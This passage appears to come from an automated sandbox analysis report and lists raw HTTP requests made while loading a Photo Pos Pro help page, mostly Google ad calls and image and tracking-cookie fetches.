kie_enabled=1&eoidce=1&nras=1&correlator=2430217688776&frm=20&pv=2&u_tz=-300&u_his=1&u_h=1024&u_w=1280&u_ah=984&u_aw=1280&u_cd=24&u_sd=1&dmc=8&adx=-12245933&ady=-12245933&biw=1017&bih=853&scr_x=0&scr_y=0&eid=31090561%2C95344788&oid=2&pvsid=2478212432439018&tmod=571211461&uas=0&nvt=1&fsapi=1&fc=1920&brdim=10%2C10%2C10%2C10%2C1280%2C0%2C1050%2C964%2C1034%2C870&vis=1&rsz=%7C%7Cs%7C&abl=NS&fu=33792&bc=31&bz=1.02&td=1&tdf=0&psd=W251bGwsbnVsbCxudWxsLDNd&nt=1&ifi=1&uci=a!1&fsb=1&dtd=1531 HTTP/1.1Host: googleads.g.doubleclick.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiUocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://www.photopos.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                  Source: global trafficHTTP traffic detected: GET /pagead/ads?client=ca-pub-1428940366894897&output=html&h=90&slotname=3041733634&adk=1285989196&adf=412585417&pi=t.ma~as.3041733634&w=728&abgtt=9&lmt=1740326324&format=728x90&url=https%3A%2F%2Fwww.photopos.com%2FPhotoPosPro_FreePhotoEditor_v3%2FHelp%2520Pages%2FPPP3_Help_Welcome.aspx&wgl=1&uach=WyJXaW5kb3dzIiwiMTAuMC4wIiwieDg2IiwiIiwiMTE3LjAuNTkzOC4xMzIiLG51bGwsMCxudWxsLCI2NCIsW1siR29vZ2xlIENocm9tZSIsIjExNy4wLjU5MzguMTMyIl0sWyJOb3Q7QT1CcmFuZCIsIjguMC4wLjAiXSxbIkNocm9taXVtIiwiMTE3LjAuNTkzOC4xMzIiXV0sMF0.&dt=1740326324486&bpp=18&bdt=2762&idt=261&shv=r20250218&mjsv=m202502180101&ptt=9&saldr=aa&abxe=1&cookie_enabled=1&eoidce=1&prev_fmts=0x0&nras=1&correlator=2430217688776&frm=20&pv=1&u_tz=-300&u_his=1&u_h=1024&u_w=1280&u_ah=984&u_aw=1280&u_cd=24&u_sd=1&dmc=8&adx=271&ady=10&biw=1017&bih=853&scr_x=0&scr_y=0&eid=31090561%2C95344788&oid=2&pvsid=2478212432439018&tmod=571211461&uas=0&nvt=1&fc=1920&brdim=10%2C10%2C10%2C10%2C1280%2C0%2C1050%2C964%2C1034%2C870&vis=1&rsz=%7C%7CeE%7C&abl=CS&pfx=0&fu=1024&bc=31&bz=1.02&td=1&tdf=0&psd=W251bGwsbnVsbCxudWxsLDNd&nt=1&ifi=2&uci=a!2&fsb=1&dtd=269 HTTP/1.1Host: googleads.g.doubleclick.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiUocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://www.photopos.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                  Source: global trafficHTTP traffic detected: GET /pagead/ads?client=ca-pub-1428940366894897&output=html&h=164&slotname=1037575739&adk=145184860&adf=840300260&pi=t.ma~as.1037575739&w=654&abgtt=8&fwrn=4&lmt=1740326324&rafmt=11&format=654x164&url=https%3A%2F%2Fwww.photopos.com%2FPhotoPosPro_FreePhotoEditor_v3%2FHelp%2520Pages%2FPPP3_Help_Welcome.aspx&wgl=1&uach=WyJXaW5kb3dzIiwiMTAuMC4wIiwieDg2IiwiIiwiMTE3LjAuNTkzOC4xMzIiLG51bGwsMCxudWxsLCI2NCIsW1siR29vZ2xlIENocm9tZSIsIjExNy4wLjU5MzguMTMyIl0sWyJOb3Q7QT1CcmFuZCIsIjguMC4wLjAiXSxbIkNocm9taXVtIiwiMTE3LjAuNTkzOC4xMzIiXV0sMF0.&dt=1740326324650&bpp=1&bdt=2926&idt=147&shv=r20250218&mjsv=m202502180101&ptt=9&saldr=aa&abxe=1&cookie_enabled=1&eoidce=1&prev_fmts=0x0%2C728x90&nras=1&correlator=2430217688776&frm=20&pv=1&rplot=4&u_tz=-300&u_his=1&u_h=1024&u_w=1280&u_ah=984&u_aw=1280&u_cd=24&u_sd=1&dmc=8&adx=351&ady=2655&biw=1017&bih=853&scr_x=0&scr_y=0&eid=31090561%2C95344788&oid=2&pvsid=2478212432439018&tmod=571211461&uas=0&nvt=1&fc=1920&brdim=10%2C10%2C10%2C10%2C1280%2C0%2C1050%2C964%2C1034%2C870&vis=1&rsz=%7C%7CeEbr%7C&abl=CS&pfx=0&fu=1152&bc=31&bz=1.02&td=1&tdf=0&psd=W251bGwsbnVsbCxudWxsLDNd&nt=1&ifi=3&uci=a!3&btvi=1&fsb=1&dtd=151 HTTP/1.1Host: googleads.g.doubleclick.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiUocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://www.photopos.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                  Source: global trafficHTTP traffic detected: GET /PhotoPosPro_FreePhotoEditor_v3/WebResource.axd?d=nFJclY7IqT05WzSJYW-EiOhezMMe9VKUy5RbkuVxRiisGhVrmsDp7xks2EPtrqkNwFNpJY2qYaO2hQP-SuYC99Y7yCtH8scwIPpdPJArAGGgy-iXoUrcwpyhh0CZe1CY_nF9C5jpejbQvsNCC5JmmZj5P9U30XXFVd9PSBaCkL01&t=637733355006018647 HTTP/1.1Host: www.photopos.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.photopos.com/PhotoPosPro_FreePhotoEditor_v3/WebResource.axd?d=9p3gvwZUx3_KaVXGD-X7M51F-VL5jYdnWe0CW-BfpTnUXEjoRtSjdMVwf_wFObFpDGMX02c30znEqiW6iPP-W4KDDXDgH2DtT3GEBFZs0JOEKlYejirihzfkZwunBia1TfTUn2suR_w9qUDmLzsZ5Q2&t=637733355006018647Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.416696101.1740326323; _ga_0XL7LCZSXK=GS1.1.1740326323.1.0.1740326323.0.0.0; __utma=248137542.416696101.1740326323.1740326324.1740326324.1; __utmc=248137542; __utmz=248137542.1740326324.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmt=1; __utmb=248137542.1.10.1740326324
                  Source: global trafficHTTP traffic detected: GET /PhotoPosPro_FreePhotoEditor_v3/WebResource.axd?d=X-UIb68BtNw7RPTt6L1EVmkvLw7U3JaHXdqtfj0q0PFyibVVSW1_QxcO_v-fAAhaODFT1ZCa4dCFCX9OampIVu-WzlVtw2Pt8_akRFZ8EYOKpZsEFBaLkoq9RkkPWoY1ykUf0iHl-qEZUMw38aeHoSMc5dKfBhU_mdqXYvSzaig1&t=637733355006018647 HTTP/1.1Host: www.photopos.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.photopos.com/PhotoPosPro_FreePhotoEditor_v3/WebResource.axd?d=9p3gvwZUx3_KaVXGD-X7M51F-VL5jYdnWe0CW-BfpTnUXEjoRtSjdMVwf_wFObFpDGMX02c30znEqiW6iPP-W4KDDXDgH2DtT3GEBFZs0JOEKlYejirihzfkZwunBia1TfTUn2suR_w9qUDmLzsZ5Q2&t=637733355006018647Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.416696101.1740326323; _ga_0XL7LCZSXK=GS1.1.1740326323.1.0.1740326323.0.0.0; __utma=248137542.416696101.1740326323.1740326324.1740326324.1; __utmc=248137542; __utmz=248137542.1740326324.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmt=1; __utmb=248137542.1.10.1740326324
                  Source: global trafficHTTP traffic detected: GET /PhotoPosPro_FreePhotoEditor_v3/Help%20Pages/Help%20Images/Misc/Keyboard1.png HTTP/1.1Host: www.photopos.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.photopos.com/PhotoPosPro_FreePhotoEditor_v3/Help%20Pages/PPP3_Help_Welcome.aspxAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.416696101.1740326323; _ga_0XL7LCZSXK=GS1.1.1740326323.1.0.1740326323.0.0.0; __utma=248137542.416696101.1740326323.1740326324.1740326324.1; __utmc=248137542; __utmz=248137542.1740326324.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmt=1; __utmb=248137542.1.10.1740326324
                  Source: global trafficHTTP traffic detected: GET /PhotoPosPro_FreePhotoEditor_v3/Help%20Pages/Help%20Images/Misc/Help.png HTTP/1.1Host: www.photopos.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.photopos.com/PhotoPosPro_FreePhotoEditor_v3/Help%20Pages/PPP3_Help_Welcome.aspxAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.416696101.1740326323; _ga_0XL7LCZSXK=GS1.1.1740326323.1.0.1740326323.0.0.0; __utma=248137542.416696101.1740326323.1740326324.1740326324.1; __utmc=248137542; __utmz=248137542.1740326324.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmt=1; __utmb=248137542.1.10.1740326324
                  Source: global trafficHTTP traffic detected: GET /PhotoPosPro_FreePhotoEditor_v3/Help%20Pages/Help%20Images/Misc/Brightness.png HTTP/1.1Host: www.photopos.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.photopos.com/PhotoPosPro_FreePhotoEditor_v3/Help%20Pages/PPP3_Help_Welcome.aspxAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.416696101.1740326323; _ga_0XL7LCZSXK=GS1.1.1740326323.1.0.1740326323.0.0.0; __utma=248137542.416696101.1740326323.1740326324.1740326324.1; __utmc=248137542; __utmz=248137542.1740326324.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmt=1; __utmb=248137542.1.10.1740326324
                  Source: global trafficHTTP traffic detected: GET /PhotoPosPro_FreePhotoEditor_v3/Help%20Pages/Tutorials/Framing%20Photos/FramingPhotos1.jpg HTTP/1.1Host: www.photopos.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.photopos.com/PhotoPosPro_FreePhotoEditor_v3/Help%20Pages/PPP3_Help_Welcome.aspxAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.416696101.1740326323; _ga_0XL7LCZSXK=GS1.1.1740326323.1.0.1740326323.0.0.0; __utma=248137542.416696101.1740326323.1740326324.1740326324.1; __utmc=248137542; __utmz=248137542.1740326324.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmt=1; __utmb=248137542.1.10.1740326324
                  Source: global trafficHTTP traffic detected: GET /PhotoPosPro_FreePhotoEditor_v3/Help%20Pages/Tutorials/CloneBrush1/CloneBrush1.jpg HTTP/1.1Host: www.photopos.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.photopos.com/PhotoPosPro_FreePhotoEditor_v3/Help%20Pages/PPP3_Help_Welcome.aspxAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.416696101.1740326323; _ga_0XL7LCZSXK=GS1.1.1740326323.1.0.1740326323.0.0.0; __utma=248137542.416696101.1740326323.1740326324.1740326324.1; __utmc=248137542; __utmz=248137542.1740326324.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmt=1; __utmb=248137542.1.10.1740326324
                  Source: global trafficHTTP traffic detected: GET /PhotoPosPro_FreePhotoEditor_v3/Help%20Pages/HowToGuide/Images/AutoWB1a.jpg HTTP/1.1Host: www.photopos.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.photopos.com/PhotoPosPro_FreePhotoEditor_v3/Help%20Pages/PPP3_Help_Welcome.aspxAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.416696101.1740326323; _ga_0XL7LCZSXK=GS1.1.1740326323.1.0.1740326323.0.0.0; __utma=248137542.416696101.1740326323.1740326324.1740326324.1; __utmc=248137542; __utmz=248137542.1740326324.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmt=1; __utmb=248137542.1.10.1740326324
                  Source: global trafficHTTP traffic detected: GET /PhotoPosPro_FreePhotoEditor_v3/Help%20Pages/Tutorials/CropPhoto/Crop1.jpg HTTP/1.1Host: www.photopos.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.photopos.com/PhotoPosPro_FreePhotoEditor_v3/Help%20Pages/PPP3_Help_Welcome.aspxAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.416696101.1740326323; _ga_0XL7LCZSXK=GS1.1.1740326323.1.0.1740326323.0.0.0; __utma=248137542.416696101.1740326323.1740326324.1740326324.1; __utmc=248137542; __utmz=248137542.1740326324.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmt=1; __utmb=248137542.1.10.1740326324
                  Source: global trafficHTTP traffic detected: GET /PhotoPosPro_FreePhotoEditor_v3/Help%20Pages/Tutorials/MagicSelectionBrush1/Main1.jpg HTTP/1.1Host: www.photopos.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.photopos.com/PhotoPosPro_FreePhotoEditor_v3/Help%20Pages/PPP3_Help_Welcome.aspxAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.416696101.1740326323; _ga_0XL7LCZSXK=GS1.1.1740326323.1.0.1740326323.0.0.0; __utma=248137542.416696101.1740326323.1740326324.1740326324.1; __utmc=248137542; __utmz=248137542.1740326324.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmt=1; __utmb=248137542.1.10.1740326324
                  Source: global trafficHTTP traffic detected: GET /PhotoPosPro_FreePhotoEditor_v3/Help%20Pages/Help%20Images/PPP3_ScreenShot2.jpg HTTP/1.1Host: www.photopos.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.photopos.com/PhotoPosPro_FreePhotoEditor_v3/Help%20Pages/PPP3_Help_Welcome.aspxAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.416696101.1740326323; _ga_0XL7LCZSXK=GS1.1.1740326323.1.0.1740326323.0.0.0; __utma=248137542.416696101.1740326323.1740326324.1740326324.1; __utmc=248137542; __utmz=248137542.1740326324.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmt=1; __utmb=248137542.1.10.1740326324
                  Source: global trafficHTTP traffic detected: GET /PhotoPosPro_FreePhotoEditor_v3/Help%20Pages/Tutorials/TallerEffect1/TallerEffect1.jpg HTTP/1.1Host: www.photopos.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.photopos.com/PhotoPosPro_FreePhotoEditor_v3/Help%20Pages/PPP3_Help_Welcome.aspxAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.416696101.1740326323; _ga_0XL7LCZSXK=GS1.1.1740326323.1.0.1740326323.0.0.0; __utma=248137542.416696101.1740326323.1740326324.1740326324.1; __utmc=248137542; __utmz=248137542.1740326324.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmt=1; __utmb=248137542.1.10.1740326324; __gads=ID=4688b6cfea46fcf5:T=1740326326:RT=1740326326:S=ALNI_MZcjtuVQ4ey8xmcOpGdj4ty5nWg8A; __gpi=UID=000010400d671c69:T=1740326326:RT=1740326326:S=ALNI_MZvMk2RX0DrvK_ZYtpkgZ2anKTyZw; __eoi=ID=a73a950e8b687589:T=1740326326:RT=1740326326:S=AA-AfjYWjoKZSzCfr3rfuQpOlQZP
                  Source: global trafficHTTP traffic detected: GET /pagead/drt/s?v=r20120211 HTTP/1.1Host: googleads.g.doubleclick.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiUocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUXSec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-1428940366894897&output=html&h=90&slotname=3041733634&adk=1285989196&adf=412585417&pi=t.ma~as.3041733634&w=728&abgtt=9&lmt=1740326324&format=728x90&url=https%3A%2F%2Fwww.photopos.com%2FPhotoPosPro_FreePhotoEditor_v3%2FHelp%2520Pages%2FPPP3_Help_Welcome.aspx&wgl=1&uach=WyJXaW5kb3dzIiwiMTAuMC4wIiwieDg2IiwiIiwiMTE3LjAuNTkzOC4xMzIiLG51bGwsMCxudWxsLCI2NCIsW1siR29vZ2xlIENocm9tZSIsIjExNy4wLjU5MzguMTMyIl0sWyJOb3Q7QT1CcmFuZCIsIjguMC4wLjAiXSxbIkNocm9taXVtIiwiMTE3LjAuNTkzOC4xMzIiXV0sMF0.&dt=1740326324486&bpp=18&bdt=2762&idt=261&shv=r20250218&mjsv=m202502180101&ptt=9&saldr=aa&abxe=1&cookie_enabled=1&eoidce=1&prev_fmts=0x0&nras=1&correlator=2430217688776&frm=20&pv=1&u_tz=-300&u_his=1&u_h=1024&u_w=1280&u_ah=984&u_aw=1280&u_cd=24&u_sd=1&dmc=8&adx=271&ady=10&biw=1017&bih=853&scr_x=0&scr_y=0&eid=31090561%2C95344788&oid=2&pvsid=2478212432439018&tmod=571211461&uas=0&nvt=1&fc=1920&brdim=10%2C10%2C10%2C10%2C1280%2C0%2C1050%2C964%2C1034%2C870&vis=1&rsz=%7C%7CeE%7C&abl=CS&pfx=0&fu=1024&bc=31&bz=1.02&td=1&tdf=0&psd=W251bGwsbnVsbCxudWxsLDNd&nt=1&ifi=2&uci=a!2&fsb=1&dtd=269Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: test_cookie=CheckForPermission
                  Source: global trafficHTTP traffic detected: GET /PhotoPosPro_FreePhotoEditor_v3/Help%20Pages/Tutorials/ChangePhotoDepthZoomIn/ChangePhotoDepthZoomIn1.jpg HTTP/1.1Host: www.photopos.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.photopos.com/PhotoPosPro_FreePhotoEditor_v3/Help%20Pages/PPP3_Help_Welcome.aspxAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.416696101.1740326323; _ga_0XL7LCZSXK=GS1.1.1740326323.1.0.1740326323.0.0.0; __utma=248137542.416696101.1740326323.1740326324.1740326324.1; __utmc=248137542; __utmz=248137542.1740326324.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmt=1; __utmb=248137542.1.10.1740326324; __gads=ID=4688b6cfea46fcf5:T=1740326326:RT=1740326326:S=ALNI_MZcjtuVQ4ey8xmcOpGdj4ty5nWg8A; __gpi=UID=000010400d671c69:T=1740326326:RT=1740326326:S=ALNI_MZvMk2RX0DrvK_ZYtpkgZ2anKTyZw; __eoi=ID=a73a950e8b687589:T=1740326326:RT=1740326326:S=AA-AfjYWjoKZSzCfr3rfuQpOlQZP
                  Source: global trafficHTTP traffic detected: GET /PhotoPosPro_FreePhotoEditor_v3/Help%20Pages/Tutorials/LevelerTool1/LevelerTool1.jpg HTTP/1.1Host: www.photopos.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.photopos.com/PhotoPosPro_FreePhotoEditor_v3/Help%20Pages/PPP3_Help_Welcome.aspxAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.416696101.1740326323; _ga_0XL7LCZSXK=GS1.1.1740326323.1.0.1740326323.0.0.0; __utma=248137542.416696101.1740326323.1740326324.1740326324.1; __utmc=248137542; __utmz=248137542.1740326324.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmt=1; __utmb=248137542.1.10.1740326324; __gads=ID=4688b6cfea46fcf5:T=1740326326:RT=1740326326:S=ALNI_MZcjtuVQ4ey8xmcOpGdj4ty5nWg8A; __gpi=UID=000010400d671c69:T=1740326326:RT=1740326326:S=ALNI_MZvMk2RX0DrvK_ZYtpkgZ2anKTyZw; __eoi=ID=a73a950e8b687589:T=1740326326:RT=1740326326:S=AA-AfjYWjoKZSzCfr3rfuQpOlQZP
                  Source: global trafficHTTP traffic detected: GET /simgad/17147156143050066190/14763004658117789537?w=100&h=100&tw=1&q=75 HTTP/1.1Host: s0.2mdn.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://googleads.g.doubleclick.net/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
